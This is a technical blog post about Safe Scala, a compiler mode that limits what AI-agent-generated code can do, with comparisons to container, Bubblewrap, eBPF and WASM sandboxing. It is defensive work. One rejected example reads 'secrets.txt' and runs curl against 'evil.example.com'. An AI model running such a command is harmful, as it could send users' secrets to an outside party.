AI agents are powerful: they can execute many day-to-day tasks thanks to their understanding of the surrounding context. That's what sets them apart from ordinary automations.
However, they can also go wrong in various ways. That's why giving an agent free access to your computer (unrestricted hard drive access, email, calendar, a web browser with logged-in accounts, and so on) might not be the best idea.
The reasons range from agent incompetence, where a "photo cleanup" request ends with all of your photos permanently removed instead of neatly organized into folders (technically, an empty folder is the ultimate cleanliness), to actively hostile scenarios, where your private data is exfiltrated to a third party through prompt injection.
There are several options for restricting the actions an AI agent can perform. Safe Scala provides tools to achieve just that. Let's take a short overview of how Safe Scala works and what the alternatives are.

Level 0: code generation
We'll start with an entirely insecure setup, where an AI agent can do anything. However, we'll depart slightly from the current status quo of giving an agent a wide set of MCP tools.
Instead, we'll "only" allow agents to generate & run code. This model is strictly more powerful: the same tools can still be called from the code (not necessarily through the MCP protocol; the functionality provided by MCP tools can instead be exposed as a set of APIs). Moreover, the results of tool calls can be processed by the generated code, and tools can be called multiple times, in loops, and so on. This idea is not new; Anthropic wrote about it about half a year ago.
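To make the difference concrete, here is a plain-Scala sketch of the model (the tool names and their behavior are entirely hypothetical): tools are exposed as an ordinary API, and the "generated" code filters, loops over, and combines their results, which a single tool call cannot do.

```scala
// Hypothetical "tools" exposed as a plain Scala API (names are illustrative).
object Tools:
  def listFiles(): List[String] = List("a.jpg", "b.jpg", "notes.txt")
  def isImage(name: String): Boolean = name.endsWith(".jpg")
  def moveToFolder(name: String, folder: String): String = s"$folder/$name"

// "Agent-generated" code: calls tools repeatedly and processes their results.
@main def organizePhotos(): Unit =
  val moved = Tools.listFiles()
    .filter(Tools.isImage)
    .map(Tools.moveToFolder(_, "photos"))
  println(moved.mkString(", "))
```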
Such code-generation-with-tools can be implemented in many languages: Python, Ruby, TypeScript, Scala, pick your favorite. And while powerful, this is also inherently insecure: if the code generated by the agent is not sandboxed in any way, the agent can do anything. A general-purpose language can typically run arbitrary external commands or call any external API. That's not usually what you want.
Level 1: restricting side-effects
To make an AI agent more secure, we might want to restrict the actions that it can take, especially ones that are irreversible and have side effects: deleting a file, replying to an email, scheduling a calendar event. We might also want to prevent the agent from reading certain confidential information.
This can be (and is) implemented in a number of ways. One option is to restrict the code that can be executed: for example, only run programs that have passed some form of verification, such as compilation. In this scenario, some language features may be unavailable, and the agent can only use a "safe" subset of the APIs. Another option is to run arbitrary code within a sandbox, implementing runtime verification rather than build-time verification. Realistically, to implement defense in depth, you might want to combine both options; they are not mutually exclusive.
Safe Scala implements the first variant: restricting the Scala language, the standard library, and external APIs to a "safe" subset. Once a Safe Scala program passes compilation, it is guaranteed to execute safely.
Safe mode in Scala is currently available only in the nightly compiler builds, and can be enabled with import language.experimental.safe at the top of the source file. Safe Scala was introduced in the Tracking Capabilities for Safer Agents paper, and is also described by Martin Odersky in his Scalar 2026 talk (videos available soon!).
In Safe Scala, a number of Scala constructs and APIs are off-limits:
- no runtime reflection
- no type casts
- no printing to the console
- no file, network, or system process operations
Additionally, the code is compiled with explicit null checking, capability tracking, and mutation tracking (more on that later).
For example, this compiles fine in Safe Scala (all examples are runnable using scala-cli):
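A minimal sketch of such a program (a hypothetical example; safe mode requires a nightly Scala 3 build):

```scala
//> using scala 3.nightly
import language.experimental.safe

// Pure computation only: no I/O, no casts, no reflection.
@main def pure(): Unit =
  val words = List("safe", "scala")
  val total = words.map(_.length).sum
  // `total` is computed, but there is no way to print or persist it here
```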
However, these end up with compiler errors:
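For instance (a sketch; the exact error messages depend on the compiler build):

```scala
//> using scala 3.nightly
import language.experimental.safe

@main def rejected(): Unit =
  println("hello")                          // error: console output is not allowed
  val s = ("abc": Any).asInstanceOf[String] // error: type casts are forbidden
```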
As well as this:
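Attempts at file or process access fail in the same way (again, a sketch):

```scala
//> using scala 3.nightly
import language.experimental.safe

@main def alsoRejected(): Unit =
  val secrets = scala.io.Source.fromFile("secrets.txt").mkString // error: file access
  Runtime.getRuntime.exec(Array("curl", "evil.example.com"))     // error: spawning processes
```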
Applications written entirely in Safe Scala might be safe, but without the possibility of any side effects whatsoever, they would also be quite useless (you aren't even able to println the result of your program!). That's why we need a mechanism to selectively allow side-effecting code through trusted libraries.
Such trusted libraries need to expose a reviewed, constrained set of side effects. This might be an API for reading and writing to a specific directory, or for performing network calls to a specific service. We might even expose a full HTTP client, albeit with a pre-configured interceptor that only allows connections to domains on an allow-list.
Hence, the Safe Scala approach doesn't mean that all security checks are performed at compile-time—some checks can still be delegated to run-time. However, the safe API that we expose already includes those runtime checks.
Code can be marked as trusted using the @assumeSafe annotation. Of course, this annotation cannot be used within a Safe Scala program—otherwise, an agent could just generate @assumeSafe-annotated code, and circumvent our security measures.
Instead, Safe Scala restricts which library code can be called: only libraries compiled in safe mode or annotated with @assumeSafe. We can publish such a library locally, in the environment where agent-generated code runs, or to a shared repository:
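A sketch of such a library (the names ResultFile and writeResult are illustrative, and the exact placement of @assumeSafe may differ in the nightly builds):

```scala
package trusted

import java.nio.file.{Files, Paths}

// Trusted, human-reviewed code: exempt from safe-mode checks.
@assumeSafe
object ResultFile:
  // Write-only API: the agent can store a result, but has no way to read it back.
  def writeResult(content: String): Unit =
    Files.writeString(Paths.get("result.txt"), content)
```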
Then, we can use the library:
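For example, assuming a trusted library that exposes a write-only ResultFile.writeResult method (a hypothetical snippet of agent-generated code):

```scala
//> using scala 3.nightly
import language.experimental.safe
import trusted.ResultFile

@main def compute(): Unit =
  val total = (1 to 10).sum          // 55
  ResultFile.writeResult(total.toString)
```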
Indeed, after running this code, the result.txt file has the content 55. Note that the agent can never see the result: it has no way, using only the library code we have exposed to it, to read any files.
Level 1: alternative approaches
Describing alternatives in depth would be an article on its own, so we'll just briefly cover two.
First, we already mentioned running arbitrary code in a sandboxed environment. This might, for example, be a Docker container with only some host directories mounted. That way, the code cannot access or modify anything on the host except the specified folders. Also, network connectivity can be constrained, including advanced filtering using a man-in-the-middle proxy.
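For example, an invocation along these lines (the image and script names are hypothetical) mounts a single working directory and disables networking entirely:

```shell
# Only ./work is visible inside the container; no network access at all.
docker run --rm \
  --network none \
  -v "$PWD/work":/work \
  -w /work \
  agent-runner:latest ./run-generated-code.sh
```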
That's the approach that we took to implement our development setup for dangerously running Claude Code with reasonable security, in the Sandcat project.
In fact, Docker itself now has its own sandbox mode, and there are a number of other projects providing container-based sandboxing.
However, while running a container might be fine for a stand-alone, long-running agent, otherwise it's quite a heavy solution. A lighter-weight option is Bubblewrap on Linux (or Seatbelt on macOS), which can control file visibility, combined with Landlock to control file access. That way, a process can be run with restricted privileges within the host operating system.
That's also used in the wild: the above tools are what Anthropic uses for its /sandbox in Claude Code. However, that sandbox offers only partial security, as it only covers bash operations (not all tool calls).
Yet another option is to write a custom eBPF program and attach it to a container (or even your host), filtering file and network access for the relevant processes. This can be done by attaching the eBPF program to Linux Security Module hooks.
Finally, an approach similar to what we did so far with Safe Scala can be implemented by compiling, e.g., Rust to WASM, or running TypeScript inside a WASM-sandboxed JavaScript engine. By default, a WASM module cannot perform any I/O. However, the ability to interact with the external world can be added through WASI (WebAssembly System Interface) capabilities. How this is done depends on the specific WASM runtime, but we can expose certain directories, or write arbitrary code that filters network access.
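For instance, with the wasmtime runtime, directory access is granted explicitly at launch (a sketch; the module name is hypothetical, and flag syntax varies between runtimes and versions):

```shell
# The module can only see ./data; every other path simply doesn't exist for it.
wasmtime run --dir=./data module.wasm
```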
It's entirely a run-time check: the WASM module can only use the capabilities that have been specified when launching the interpreter. Or rather, stronger than a check—if the capability isn't exposed, it simply doesn't exist and thus cannot be called.
Fun fact: Scala can also be compiled to WASM!
Level 2: Enter Scala capabilities
Restricting the language constructs and limiting the APIs that a Safe Scala program can call already gives us a lot. But there's more—thanks to capture checking, another experimental Scala 3 feature.
With capture checking, we can mark values through which side effects can be performed as tracked. Anything that captures these values (such as a function) is also tracked, since it can transitively perform side effects.
That alone might give us more compile-time safety, but crucially, we can also require the absence of side effects in certain contexts. That is, we can impose restrictions that, in some contexts, only pure functions—which don't capture any tracked values—can be used. In other contexts, we allow our carefully selected side effects to be performed.
Let's go through an example. The paper introduces a Classified[T] wrapper class, which holds values that should not be exposed to the agent (the LLM). The Classified class is defined in a library and annotated with @assumeSafe. Its definition is:
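A sketch of the definition, following the paper's design (the exact code in the paper may differ):

```scala
// Trusted library code.
@assumeSafe
class Classified[T](private val value: T):
  // Transformations must be pure (thin arrow `->`), so they cannot
  // smuggle the value out through a side effect.
  def map[U](f: T -> U): Classified[U] = Classified(f(value))

object Classified:
  def apply[T](value: T): Classified[T] = new Classified(value)
```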
Note that the function in map uses a "thin arrow": T -> U. This is the type of pure Scala functions: functions that don't capture any tracked values. Conversely, the "fat arrow" T => U is the type of functions that can capture anything.
Hence, any transformations of the classified values must be pure; they cannot have any side effects.
To make our code useful, we do want to sometimes print something back to the LLM. Hence, we need a println function, but one that requires a tracked value to be used. That's why we introduce an IO tracked value (which becomes tracked as it extends SharedCapability), and a safePrintln method, which requires this value in the implicit scope; this is all part of our library code:
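A sketch of that library code (the SharedCapability import path and the @assumeSafe placement may differ in the nightly builds):

```scala
import caps.SharedCapability

// A tracked capability: any code capturing an `IO` value is itself tracked.
class IO extends SharedCapability

// Trusted: printing back to the LLM requires an IO capability in scope.
@assumeSafe
def safePrintln(s: String)(using io: IO): Unit =
  Console.println(s)
```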
This code will now compile fine:
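For instance (a hypothetical snippet, assuming the Classified and safePrintln library described above):

```scala
import language.experimental.safe

def run(using io: IO): Unit =
  val secret = Classified(21)
  val doubled = secret.map(x => x * 2) // pure lambda: conforms to Int -> Int
  safePrintln("transformation done")   // fine: IO capability is in scope
```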
But this will fail with a compile-time error:
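For instance (again a sketch; the exact error message depends on the compiler build):

```scala
import language.experimental.safe

def leak(using io: IO): Unit =
  val secret = Classified(21)
  // error: the lambda captures `io`, so it is not a pure Int -> Int
  secret.map { x => safePrintln(x.toString); x }
```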
Of course, creating classified values from literals available in the generated code is just a demonstration—in reality, the agent-generated code would obtain classified values by reading them from a database, the network, or the filesystem. Scala would then statically guarantee that, while pure transformations on these values can be performed, they cannot be leaked to the host LLM.
For example, suppose we now extend our library with functions such as:
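A sketch of such trusted additions (the object and method names are illustrative, and `unwrap` stands in for whatever trusted access to the underlying value looks like in practice):

```scala
import java.nio.file.{Files, Paths}

@assumeSafe
object ClassifiedFiles:
  // The file's contents are classified from the start:
  // the agent can transform them, but never observe them.
  def readClassified(path: String): Classified[String] =
    Classified(Files.readString(Paths.get(path)))

  // A runtime check could additionally restrict `path` to one directory.
  def writeClassified(path: String, c: Classified[String]): Unit =
    Files.writeString(Paths.get(path), unwrap(c))

  // Hypothetical trusted accessor into Classified (sketch only).
  private def unwrap(c: Classified[String]): String = ???
```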
The agent can then generate programs that arbitrarily transform classified values, without ever being able to see them. We would probably also want to restrict the path to a specific directory, which would be enforced at runtime.
The paper includes a more developed example involving fine-grained filesystem-related capabilities and a two-LLM architecture: one "smarter" LLM for code generation and a local LLM for simpler tasks such as summarization. The local LLM is trusted, and thus doesn't require any tracked capabilities to be called.
Running Safe Scala from an agent
To run agent-generated Safe Scala code, we need to complete two more steps.
First, we need to expose the "compile & run safe-scala code" tool to the agent. This can be done by implementing an MCP server with such a tool exposed. It might be the only MCP server configured in your agent: all other tools should be available as library calls, reachable from the generated code.
Such an MCP server is exactly what's implemented in the tacit proof-of-concept project, which accompanies the Tracking Capabilities for Safer Agents paper. Hence, you might either experiment with Safe Scala directly via nightly & scala-cli, or use an MCP server that allows running generated Scala code in safe mode.
To expand your experiments, you might want to modify the library that's available to the agent. But here comes the second missing piece of the puzzle: we need to let the agent know what the interface of our library is. Currently, this has to be done in text; a separate tool returns the scaladoc for a designated trait in the library, with a full description of the available API, Safe Scala restrictions, etc.
Summing up
Safe Scala is a language mode that guarantees that if the code compiles, it doesn't circumvent the type system in any way, only calls safe library methods, and properly tracks any values through which side effects can be performed. This can be used to safely run agent-generated code.
While WASM or sandboxing restrict agent-generated code through run-time checks, Safe Scala adds the possibility of requiring that, in certain contexts, only pure functions (without side effects), or functions with certain permitted effects, can be used.
When designing an agent system, as with everything, there are tradeoffs. On one hand, agents are powerful because they can read and understand files, emails, web pages, etc. So we can't classify too much: if agents can't access or modify the data, their utility will diminish greatly.
On the other hand, running unrestricted agents has already proved catastrophic in many situations: dropped databases, erased emails, or prolonged system downtime. Hence, Safe Scala might be especially valuable, e.g., in corporate environments, where data privacy is the top concern.
Designing an agent system that leverages Safe Scala will be a delicate act of balancing security and utility, coupled with designing a library that is powerful enough, yet safe, for the agent to use.
